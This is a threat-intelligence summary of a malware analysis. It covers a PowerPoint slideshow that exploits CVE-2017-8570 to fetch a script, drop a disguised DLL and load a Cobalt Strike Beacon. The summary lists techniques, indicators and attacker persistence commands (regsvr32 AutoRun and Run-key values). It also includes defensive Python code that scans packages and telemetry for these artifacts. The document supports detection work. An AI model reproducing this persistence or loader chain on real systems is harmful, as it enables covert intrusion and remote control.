Keypoints
- Initial vector: a PPSX PowerPoint slideshow uses a remote OLE relationship and the CVE-2017-8570 RELS exploit to load an obfuscated remote script.
- The remote scriptlet (widget_iframe…) is heavily obfuscated; once deobfuscated it is a JSE that runs via cscript.exe to decode the payload, write it to disk, and set up persistence.
- The payload is dropped as C:\Users\<user>\AppData\Roaming\Cisco\AnyConnect\vpn.sessings and achieves persistence via HKCU Command Processor AutoRun (regsvr32 execution) and HKCU Run (cmd /Q /C whoami).
- The vpn.sessings DLL implements DllRegisterServer logic to decrypt and unpack a Cobalt Strike Beacon, then performs self-injection (OpenProcess, AllocateMemory, WriteProcessMemory, CreateRemoteThread).
- Loader anti-analysis includes terminating parent processes (anti-debug), CPUID VM checks, repeated NtDelayExecution stalls, attempted NTDLL unhooking, and intentionally obfuscated/bloat code and manual PE offsets to slow analysis.
- Cobalt Strike config contains a public key and C2 configuration; the Beacon communicates over HTTPS with petapixel[.]fun and targets injection into dllhost.exe.
- IOCs include domains weavesilk[.]space and petapixel[.]fun, IP 109.107.178[.]241, and SHA256 hashes for the PPSX, scriptlet, and vpn.sessings DLL.
MITRE Techniques
- [T1566] Phishing – Used a malicious PowerPoint slideshow exploiting RELS to fetch a remote script (‘PowerPoint signal-2023-12-20-160512.ppsx containing RELS exploit’)
- [T1059.007] Command and Scripting Interpreter: JavaScript – Executed an obfuscated JSE via cscript.exe to decode and drop the payload (‘widget_iframe.617766616773726468746672726a6834.html containing obfuscated JavaScript’)
- [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys – Achieved persistence via HKCU Run using ‘cmd /Q /C whoami’ (‘HKCU\Software\Microsoft\Windows\CurrentVirsion\Run: cmd /Q /C whoami’)
- [T1547] Event-Triggered Execution – Achieved persistence via Command Processor AutoRun invoking regsvr32 to load the DLL (‘HKCU\Software\Microsoft\Command Processor\AutoRun: start regsvr32 /s C:vpn.sessings’)
- [T1218.010] Signed Binary Proxy Execution: Regsvr32 – Executed the DLL using regsvr32 to bypass direct execution detection (‘start regsvr32 /s C:vpn.sessings’)
- [T1055] Process Injection – Performed self-injection of the unpacked Beacon using OpenProcess/AllocateMemory/WriteProcessMemory/CreateRemoteThread (‘Performed a self-injection after unpacking the Cobalt Strike Beacon, using the classic CreateRemoteThread method’)
- [T1027.002] Software Packing – The loader unpacks/decrypts the Cobalt Strike payload using a derived key and standard decryption routine (‘Unpacked the Cobalt Beacon using CryptDecrypt’)
- [T1057] Process Discovery – Iterated running processes to locate and terminate its parent process as an anti-debugging measure (‘Iterated the running processes to terminate its parent for anti-debugging’)
- [T1497] Virtualization/Sandbox Evasion – Used NtDelayExecution stalls and repeated short sleeps to extend execution time and evade automated sandboxes (‘Performed NtDelayExecution to stall execution, possibly to evade automatic sandbox emulation by exploiting time constraints’)
- [T1573] Encrypted Channel – Beacon uses encrypted communications (HTTPS) to the C2 server for command and control (‘C&C communication using HTTPS on port 443’)
Indicators of Compromise
- [Domain] hosting / C2 – weavesilk[.]space (second-stage script host), petapixel[.]fun (Cobalt Strike C2)
- [IP] hosting real IP behind Cloudflare – 109.107.178[.]241
- [File name] dropped and loader – vpn.sessings (loader DLL), signal-2023-12-20-160512.ppsx (malicious PPSX)
- [SHA256] sample hashes – b0b762106c22e44f7acaa3177baabd64ea28990d16672e1f902b53f49b2027c4 (signal-2023-12-20-160512.ppsx), 976f57442452cd54cada011c565ada0c01f5b1460e31ee6cea330d210d3e8f50 (vpn.sessings), and 0bc0e9410f4a9703ff0b5af7ec9383a1cc929572ade09fbd2c69ed2ae1486939 (scriptlet)
The malicious chain begins with a PPSX that references a remote OLE object using the CVE-2017-8570 RELS technique to load an obfuscated JSE hosted on weavesilk[.]space. The scriptlet, executed by cscript.exe, decodes embedded data and writes a masqueraded DLL payload to C:\Users\<user>\AppData\Roaming\Cisco\AnyConnect\vpn.sessings, then establishes persistence by setting HKCU\Software\Microsoft\Command Processor\AutoRun to run regsvr32 on the DLL and HKCU\Software\Microsoft\Windows\CurrentVersion\Run to execute a cmd-based trigger.
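The remote-relationship pattern described above can be checked for statically, because a PPSX is an OOXML zip whose `.rels` parts list every relationship a slide carries. The following is an added example, not code from the Deep Instinct report or from the sample: it walks every `.rels` part of a package and flags relationships with `TargetMode="External"` whose target is a URL or UNC path, treating an external `oleObject` relationship as the suspicious case while leaving ordinary external hyperlinks alone. The package builder, the `remote.example` URL and the `widget_iframe.html` file name it uses are constructed for the demonstration.

```python
"""Added example (not from the Deep Instinct report): flag external OLE
relationships in a PPSX/PPTX package, the hook the CVE-2017-8570 RELS
technique uses to pull a remote scriptlet."""
from __future__ import annotations

import io
import re
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
# URL schemes and UNC paths count as "off the package"
REMOTE_TARGET = re.compile(r"(?i)^(https?|ftp|file)://|^\\\\")


def find_external_relationships(package: bytes) -> list[dict]:
    """Return every relationship whose TargetMode is External and whose
    target points outside the package (URL or UNC path)."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(package)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                target = rel.get("Target", "")
                if REMOTE_TARGET.search(target):
                    hits.append({
                        "part": name,
                        # keep only the last path element of the relationship type URI
                        "type": rel.get("Type", "").rsplit("/", 1)[-1],
                        "target": target,
                    })
    return hits


def is_suspicious(hits: list[dict]) -> bool:
    """External oleObject relationships are the RELS pattern; external
    hyperlinks are ordinary in slide decks and are not flagged."""
    return any(h["type"] == "oleObject" for h in hits)


def build_sample_ppsx(remote_target: str = "") -> bytes:
    """Build a minimal package for testing (constructed, not a real sample).
    With remote_target set, slide1 carries an external oleObject relationship."""
    rels = [
        '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/>'
    ]
    if remote_target:
        rels.append(
            f'<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="{remote_target}" TargetMode="External"/>'
        )
    body = "".join(rels)
    slide_rels = f'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n<Relationships xmlns="{RELS_NS}">{body}</Relationships>'
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", '<?xml version="1.0" encoding="UTF-8"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("ppt/slides/slide1.xml", '<?xml version="1.0" encoding="UTF-8"?><sld/>')
        zf.writestr("ppt/slides/_rels/slide1.xml.rels", slide_rels)
    return buf.getvalue()


if __name__ == "__main__":
    # constructed test package; the URL is a placeholder, not an indicator
    hits = find_external_relationships(build_sample_ppsx("http://remote.example/widget_iframe.html"))
    for h in hits:
        print(f"{h['part']}: {h['type']} -> {h['target']}")
    print("suspicious:", is_suspicious(hits))
```

The check is deliberately narrow: an external relationship of type `oleObject` is what lets the document pull and activate remote content, whereas `hyperlink` relationships with external targets are normal. Run it over a directory of attachments and review every hit's `target`; the report's sample would surface as an `oleObject` relationship pointing at weavesilk[.]space.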
When invoked (via regsvr32), the DLL’s DllRegisterServer contains the main routine: it performs anti-analysis steps (terminating parent processes, CPUID VM checks, repeated NtDelayExecution stalls), attempts to unhook ntdll by reconstructing disk and memory copies and overwriting .text, and uses obfuscated/bloat code and manual PE offsets to slow reverse engineering. The loader derives a decryption key from embedded seeds, decrypts the Cobalt Strike Beacon blob, and performs in-memory self-injection (OpenProcess, VirtualAlloc/AllocateMemory, WriteProcessMemory, CreateRemoteThread, WaitForSingleObject) to execute the Beacon without writing the executable payload to disk.
The unpacked Beacon contains a configuration with a public key for encrypted communication and a C2 entry pointing to petapixel[.]fun (HTTPS). The overall procedure emphasizes fileless execution, sandbox/time-delay evasion, and API-hook bypassing to reduce detection and complicate analysis, while leaving identifiable artifacts (drop path, registry keys, domains, and SHA256 hashes) that can be used for detection and response.
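The artifacts listed in the Indicators of Compromise section and the persistence, execution and injection behaviour described in the two paragraphs above can be turned into per-event detection rules. The block below is an added example, not code from the Deep Instinct report: it runs Sysmon-style records (registry value set, file create, process create, remote thread, DNS and network events) through rules built only from what the report states, and returns which record tripped which rule. All records are constructed; the defanged domains and IP from the report are written in plain form, the `alice` user name and the Windows paths are placeholders, and the rule that ties `create_remote_thread` to `dllhost.exe` assumes the Sysmon event 8 field names (`source`, `target`).

```python
"""Added example (not from the Deep Instinct report): match Sysmon-style host
and network telemetry against the artifacts the report names. All records
below are constructed."""
from __future__ import annotations

# IoCs from the report, written without the defanging brackets
IOC_DOMAINS = {"weavesilk.space", "petapixel.fun"}
IOC_IPS = {"109.107.178.241"}
IOC_SHA256 = {
    "b0b762106c22e44f7acaa3177baabd64ea28990d16672e1f902b53f49b2027c4": "signal-2023-12-20-160512.ppsx",
    "976f57442452cd54cada011c565ada0c01f5b1460e31ee6cea330d210d3e8f50": "vpn.sessings",
    "0bc0e9410f4a9703ff0b5af7ec9383a1cc929572ade09fbd2c69ed2ae1486939": "scriptlet",
}


def check_record(rec: dict) -> list[str]:
    """Return the alert names a single record triggers (empty if none)."""
    alerts: list[str] = []
    kind = rec.get("event")
    if kind == "registry_set":
        key = rec.get("key", "").lower()
        data = rec.get("data", "").lower()
        # AutoRun runs on every cmd.exe start; the report's value launches regsvr32 on the DLL
        if key.endswith(r"\command processor\autorun") and "regsvr32" in data:
            alerts.append("autorun_regsvr32")
        # The Run value 'cmd /Q /C whoami' exists only to start cmd.exe and trip AutoRun
        if r"\currentversion\run" in key and "whoami" in data:
            alerts.append("run_key_whoami")
    elif kind == "file_create":
        path = rec.get("path", "").lower()
        if path.endswith(r"\cisco\anyconnect\vpn.sessings"):
            alerts.append("loader_drop_path")
        digest = rec.get("sha256", "").lower()
        if digest in IOC_SHA256:
            alerts.append("ioc_hash:" + IOC_SHA256[digest])
    elif kind == "process_create":
        image = rec.get("image", "").lower()
        cmd = rec.get("cmdline", "").lower().rstrip().rstrip('"')
        # regsvr32 /s on a file that is not a .dll is the masquerade the report describes
        if image.endswith(r"\regsvr32.exe") and " /s " in cmd + " " and not cmd.endswith(".dll"):
            alerts.append("regsvr32_non_dll_target")
        if image.endswith(r"\cmd.exe") and "/c whoami" in cmd:
            alerts.append("cmd_whoami_trigger")
    elif kind == "create_remote_thread":
        # Sysmon event 8 shape (assumed); dllhost.exe is the Beacon's injection target per the report
        if rec.get("target", "").lower().endswith(r"\dllhost.exe"):
            alerts.append("remote_thread_into_dllhost")
    elif kind == "dns_query":
        if rec.get("query", "").lower().rstrip(".") in IOC_DOMAINS:
            alerts.append("ioc_domain")
    elif kind == "network_connect":
        if rec.get("dst_ip") in IOC_IPS or rec.get("dst_host", "").lower() in IOC_DOMAINS:
            alerts.append("ioc_network")
    return alerts


def scan(records: list[dict]) -> list[tuple[int, str]]:
    """Run check_record over a record stream; returns (record index, alert) pairs."""
    return [(i, a) for i, rec in enumerate(records) for a in check_record(rec)]


# Constructed telemetry following the chain in the report; record 8 is a benign control
DROP = r"C:\Users\alice\AppData\Roaming\Cisco\AnyConnect\vpn.sessings"
SAMPLE_RECORDS = [
    {"event": "dns_query", "query": "weavesilk.space"},
    {"event": "file_create", "path": DROP,
     "sha256": "976f57442452cd54cada011c565ada0c01f5b1460e31ee6cea330d210d3e8f50"},
    {"event": "registry_set", "key": r"HKCU\Software\Microsoft\Command Processor\AutoRun",
     "data": "start regsvr32 /s " + DROP},
    {"event": "registry_set", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "data": "cmd /Q /C whoami"},
    {"event": "process_create", "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd /Q /C whoami"},
    {"event": "process_create", "image": r"C:\Windows\System32\regsvr32.exe", "cmdline": "regsvr32 /s " + DROP},
    {"event": "create_remote_thread", "source": r"C:\Windows\System32\regsvr32.exe",
     "target": r"C:\Windows\System32\dllhost.exe"},
    {"event": "network_connect", "dst_ip": "109.107.178.241", "dst_port": 443},
    {"event": "process_create", "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32 /s C:\Program Files\Vendor\plugin.dll"},
]

if __name__ == "__main__":
    for idx, alert in scan(SAMPLE_RECORDS):
        print(f"record {idx}: {alert}")
```

The hash, domain and IP rules are exact-match and will age with the infrastructure; the registry, drop-path, `regsvr32`-without-`.dll` and remote-thread rules key on the behaviour the report documents and hold up even if the attacker rotates domains. The `cmd /Q /C whoami` Run value is worth alerting on by itself: it does nothing useful except launch `cmd.exe`, which is exactly what the Command Processor AutoRun value needs in order to fire.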
Read more: https://www.deepinstinct.com/blog/uncorking-old-wine-zero-day-cobalt-strike-loader